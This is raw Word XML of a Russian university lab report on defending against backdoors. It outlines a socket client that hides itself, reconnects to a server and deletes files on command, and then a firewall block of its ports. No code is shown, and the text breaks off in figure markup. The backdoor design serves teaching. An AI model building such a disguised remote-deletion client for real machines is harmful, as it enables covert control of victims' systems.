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59A76" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Министерство образования и науки Российской Федерации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D03710B" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Санкт-Петербургский Политехнический Университет Петра Великого</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2814741C" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B72A18" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Институт кибербезопасности и защиты информации </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D69EFB" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162CC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="089DC8DF" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162CC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="282FC3A4" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162CC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B713FFF" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162CC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52B0F62C" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162CC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69E0DC56" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162CC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7271ADB9" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162CC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E229449" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162CC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F9F7495" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162CC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03485D96" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162CC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_heading=h.gjdgxs" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="0A3AF4B9" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162CC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12CB1DA7" w14:textId="429D8E25" w:rsidR="006162CC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">ЛАБОРАТОРНАЯ РАБОТА № </w:t>
      </w:r>
      <w:r w:rsidR="00240C21">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153D3BDF" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162CC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38A50547" w14:textId="5DE7E241" w:rsidR="006162CC" w:rsidRPr="00240C21" w:rsidRDefault="00240C21" w:rsidP="00240C21">
      <w:pPr>
        <w:ind w:left="2029" w:firstLine="131"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00240C21">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Защита от встраиваемых потайных ходов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC852E8" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F53CCDC" w14:textId="7EAB35E4" w:rsidR="000B618B" w:rsidRPr="00F91591" w:rsidRDefault="000B618B" w:rsidP="000B618B">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00F91591">
        <w:t>по дисциплине «</w:t>
      </w:r>
      <w:r>
        <w:t>Основы информационной безопасност</w:t>
      </w:r>
      <w:r w:rsidR="00240C21">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00F91591">
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB377D7" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162CC"/>
    <w:p w14:paraId="5C093078" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162CC"/>
    <w:p w14:paraId="679562BA" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162CC"/>
    <w:p w14:paraId="68F9726D" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162CC"/>
    <w:p w14:paraId="44A7BF47" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162CC"/>
    <w:p w14:paraId="7261CE0C" w14:textId="77777777" w:rsidR="006162C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567" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Выполнил</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2A9899" w14:textId="5302CAA6" w:rsidR="006162CC" w:rsidRDefault="00000000" w:rsidP="261F60A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960"/>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F60A5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>студент гр.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="19C2794E">
        <w:t>485100</w:t>
      </w:r>
      <w:r w:rsidR="000B618B">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="004D11A1">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="0DB698D7">
        <w:t>000</w:t>
      </w:r>
      <w:r w:rsidR="000B618B">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="261F60A5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidR="000B618B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Федорова</w:t>
      </w:r>
      <w:r w:rsidR="004D11A1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1AAB19B9">
        <w:t>А</w:t>
      </w:r>
      <w:r w:rsidR="004D11A1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000B618B">
        <w:t>А</w:t>
      </w:r>
      <w:r w:rsidR="004D11A1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562CF155" w14:textId="77777777" w:rsidR="006162C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4746"/>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>подпись</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15333C39" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162C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567" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="699A1139" w14:textId="77777777" w:rsidR="006162C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567" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Преподаватель</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D62099B" w14:textId="500879DA" w:rsidR="00BE5FA6" w:rsidRDefault="00000000" w:rsidP="00BE5FA6">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3960"/>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>асс. преподавателя</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidR="00BE5FA6">
        <w:t>Климшин И.И</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5693B297" w14:textId="551736AE" w:rsidR="006162CC" w:rsidRDefault="006162C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960"/>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B37207F" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4746"/>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>подпись</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE69995" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162C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960"/>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="059E9CE9" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4746"/>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30F63777" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162CC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3960"/>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70BA9922" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162CC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3960"/>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4191A370" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162CC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3960"/>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B37E3B8" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162CC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="600566C2" w14:textId="77777777" w:rsidR="00C045FB" w:rsidRDefault="00C045FB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F058EE4" w14:textId="7CC92477" w:rsidR="006162CC" w:rsidRDefault="00000000" w:rsidP="00C045F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b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Цель работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651F5C1C" w14:textId="4A95EA45" w:rsidR="004D11A1" w:rsidRDefault="00C62E13" w:rsidP="00C045FB">
      <w:r>
        <w:t>Изучение угроз потайных ходов и методов защиты от них.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492B7027" w14:textId="61DBE499" w:rsidR="006162CC" w:rsidRPr="004D11A1" w:rsidRDefault="004D11A1" w:rsidP="00C045F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b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Описание задачи</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04983BAC" w14:textId="77777777" w:rsidR="00C62E13" w:rsidRDefault="00C62E13" w:rsidP="00C045FB">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="851"/>
      </w:pPr>
      <w:r>
        <w:t>Реализовать клиент-серверную программу, использующую сокеты для сетевого соединения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F35D9F9" w14:textId="77777777" w:rsidR="00C62E13" w:rsidRDefault="00C62E13" w:rsidP="00C045FB">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="851"/>
      </w:pPr>
      <w:r>
        <w:t>Запустить программу-клиент в виртуальной среде, программу-сервер на основной системе. Удаленно выполнить удаление файла на виртуальной машине, с установленной программой-клиентом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF810E8" w14:textId="77777777" w:rsidR="00C62E13" w:rsidRDefault="00C62E13" w:rsidP="00C045FB">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="851"/>
      </w:pPr>
      <w:r>
        <w:t>Модифицировать программу-клиент, реализуя процедуру маскировки и осуществление регулярных попыток соединения с программой-сервером.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAD59E3" w14:textId="77777777" w:rsidR="00C62E13" w:rsidRDefault="00C62E13" w:rsidP="00C045FB">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="851"/>
      </w:pPr>
      <w:r>
        <w:t>Установить программный межсетевой экран на систему с функционирующей программой-клиентом. С его помощью заблокировать используемые программами клиентом и сервером порты, и попробовать выполнить удаление файла, отметив произошедшие изменения в работе программ клиента и сервера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1702C059" w14:textId="5F99D499" w:rsidR="004D11A1" w:rsidRDefault="004D11A1" w:rsidP="00C045FB"/>
    <w:p w14:paraId="139E63A9" w14:textId="051249AE" w:rsidR="004D11A1" w:rsidRPr="004D11A1" w:rsidRDefault="004D11A1" w:rsidP="00C045F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b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Алгоритмы и методы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CFB0C5" w14:textId="77777777" w:rsidR="00775CD0" w:rsidRDefault="00775CD0" w:rsidP="00C045FB">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="851"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В ходе выполнения данной лабораторной работы была разработана клиент-серверная программа (см. Приложение А), использующая сокеты для сетевого соединения. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F84E6A3" w14:textId="77777777" w:rsidR="00775CD0" w:rsidRDefault="00775CD0" w:rsidP="00C045FB">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="851"/>
      </w:pPr>
      <w:r w:rsidRPr="00775CD0">
        <w:t>Со́кет (</w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:tooltip="Английский язык" w:history="1">
        <w:r w:rsidRPr="00775CD0">
          <w:t>англ.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00775CD0">
        <w:t> socket — разъём) — название </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tooltip="API" w:history="1">
        <w:r w:rsidRPr="00775CD0">
          <w:t>программного интерфейса</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00775CD0">
        <w:t> для обеспечения обмена данными между </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:tooltip="Процесс (информатика)" w:history="1">
        <w:r w:rsidRPr="00775CD0">
          <w:t>процессами</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00775CD0">
        <w:t>. Сокет — </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:tooltip="Абстракция" w:history="1">
        <w:r w:rsidRPr="00775CD0">
          <w:t>абстрактный</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00775CD0">
        <w:t> объект, представляющий конечную точку соединения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</w:p>
    <w:p w14:paraId="6764716C" w14:textId="5AF9E2F6" w:rsidR="00775CD0" w:rsidRDefault="00775CD0" w:rsidP="00C045FB">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="851"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Принципы работы программы: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13601BC5" w14:textId="77777777" w:rsidR="00775CD0" w:rsidRDefault="00775CD0" w:rsidP="00C045FB">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="851"/>
      </w:pPr>
      <w:r>
        <w:t>- клиент при запуске открывает определенный порт и ожидает соединения;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69161EBE" w14:textId="77777777" w:rsidR="00775CD0" w:rsidRDefault="00775CD0" w:rsidP="00C045FB">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="851"/>
      </w:pPr>
      <w:r>
        <w:t>- сервер соединяется с клиентом и передаёт имя файла, который должен быть удален;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A2D4DB" w14:textId="31BDAF5C" w:rsidR="001508E9" w:rsidRDefault="00775CD0" w:rsidP="00C045FB">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="851"/>
      </w:pPr>
      <w:r>
        <w:t>- выполняется удаление файла на системе с установленной программой-клиентом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4E6E94" w14:textId="77777777" w:rsidR="00C045FB" w:rsidRDefault="00C045FB" w:rsidP="001508E9">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="524A8532" w14:textId="3178FFB4" w:rsidR="004D11A1" w:rsidRPr="004D11A1" w:rsidRDefault="004D11A1" w:rsidP="00187B7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b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ход работы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5791D929" w14:textId="09F6764F" w:rsidR="00F94509" w:rsidRDefault="00C045FB" w:rsidP="00C045FB">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:num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90F4DE" wp14:editId="4E48F2F4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3589020</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6012180" cy="294005"/>
                <wp:effectExtent l="0" t="0" r="7620" b="0"/>
                <wp:wrapTopAndBottom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180" cy="2940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EC556" w14:textId="13A31424" w:rsidR="00427460" w:rsidRDefault="00427460" w:rsidP="00427460">
                            <w:pPr>
                              <w:pStyle w:val="aff"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:bCs w:val="0"/>
                                <w:noProof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>Рисунок 1 – Демонстрация работы клиента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E90F4DE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6" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:282.6pt;width:473.4pt;height:23.1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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="2A0EC556" w14:textId="13A31424" w:rsidR="00427460" w:rsidRDefault="00427460" w:rsidP="00427460">
                      <w:pPr>
                        <w:pStyle w:val="aff"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b w:val="0"/>
                          <w:bCs w:val="0"/>
                          <w:noProof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>Рисунок 1 – Демонстрация работы клиента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508E9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="328DC653" wp14:editId="03FE1DD8">
            <wp:extent cx="6299835" cy="354393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B5A04" w14:textId="604927E3" w:rsidR="00595998" w:rsidRDefault="00595998" w:rsidP="001508E9">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="432"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53BEF7C1" w14:textId="6C8BE09F" w:rsidR="001508E9" w:rsidRPr="001508E9" w:rsidRDefault="00187B79" w:rsidP="00C045FB">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US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D3BE46" wp14:editId="643660D5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3638188</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6012180" cy="294005"/>
                <wp:effectExtent l="0" t="0" r="7620" b="0"/>
                <wp:wrapTopAndBottom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180" cy="2940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373C3A" w14:textId="5FC377FB" w:rsidR="00427460" w:rsidRDefault="00427460" w:rsidP="00427460">
                            <w:pPr>
                              <w:pStyle w:val="aff"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:bCs w:val="0"/>
